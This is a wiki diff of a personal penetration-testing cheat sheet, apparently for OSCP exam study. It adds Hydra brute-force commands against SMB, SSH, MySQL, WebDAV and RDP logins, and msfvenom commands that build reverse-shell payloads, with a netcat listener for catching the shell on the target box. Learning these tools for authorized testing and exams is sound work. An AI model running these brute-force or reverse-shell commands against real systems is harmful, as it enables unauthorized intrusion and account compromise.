Differences

This shows you the differences between two versions of the page.

--- cheat_sheets_various [2024/02/04 02:36] – [Hydra] gman
+++ cheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman
@@ Line 143: / Line 143: @@
 ===== Hydra =====
-Hydra: our versatile brute-forcing tool...
+Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
-  * Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
+  * [[https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack | Usage & Examples]]
-  * [[Usage & Examples | https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack]]
 Specify a single username and single password to try (lower case ''l'' and ''p''):
@@ Line 159: / Line 158: @@
 </code>
-Options:
+**Options:**
   * ''-t 4'' : number of parallel connections per target
   * ''-l [user]'' : single username of the account we are trying to compromise
@@ Line 172: / Line 171: @@
   * You could set ''-t 2'' or ''-t 3'' and see if that plays nicer.
   * Hydra actually recommends ''-t 1'' through ''-t 4''.
+**SMB:**
+<code>
+hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb
+</code>
+**SSH:**
+<code>
+hydra -l student -P rockyou.txt [ip] ssh
+</code>
+**MySQL:**
+<code>
+hydra -l root -P /usr/share/metasploit_framework/data/wordlists/unix_passwords.txt [target ip] mysql
+</code>
+**WebDAV (http login):**
+<code>
+hydra -L /.../common-users.txt -P  /.../common-passwords.txt [target ip] http-get /webdav/
+# http-get : Indicates the protocol to be used
+# /webdav/ : Indicates the directory where hydra can find the authentication mechanism
+</code>
+**RDP:**
+<code>
+hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
+# -s : service port (if different than the default)
+</code>
 **Supported services:**
@@ Line 290: / Line 322: @@
 ===== msfvenom =====
-==== Reverse Shell Payload ====
+To see the available payloads: ''msfvenom -l payloads'' (filter by piping to grep)
+  * [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]
-To generate a reverse shell payload:
+First, build a payload with MSFVenom (e.g., a reverse shell payload):
 <code>
-msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
+msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
 #
 # -p    = payload
-# lhost = our local host IP address (this is your machine's IP address)
+# LHOST = local host IP address (this is your machine's IP address)
-# lport = the port to listen on (this is the port on your machine)
+# LPORT = local port to listen on (this is the port on your machine)
+# -f    = format (of the output)
 # R     = export the payload in raw format
 </code>
+A **staged** payload will follow this syntax (note the delimiter):
+  * ''windows/x64/meterpreter/reverse_tcp''
+  * ''linux/x86/meterpreter/reverse_tcp''
+A **non-staged** payload will follow this syntax:
+  * ''windows/x64/meterpreter_reverse_tcp''
+  * ''linux/x86/meterpreter_reverse_tcp''
 After that set up a listener on your attach machine:
-<code>nc -nvvlp [listening port]</code>
+<code>nc -nvlp [listening port]</code>
 Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.
@@ Line 311: / Line 354: @@
 ----
-==== Notes ====
+===== net commands (Windows) =====
-**To-Do:** https://www.reddit.com/r/oscp/comments/ixmqp0/msfvenom/
+stuff
+
+----
-**Source:** https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
-**Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom.
-**Additional:**
-  * msfvenom cheatsheet: https://netsec.ws/?p=331
-  * To see all available payloads: ''msfvenom -l payloads''
-----
 ===== ping =====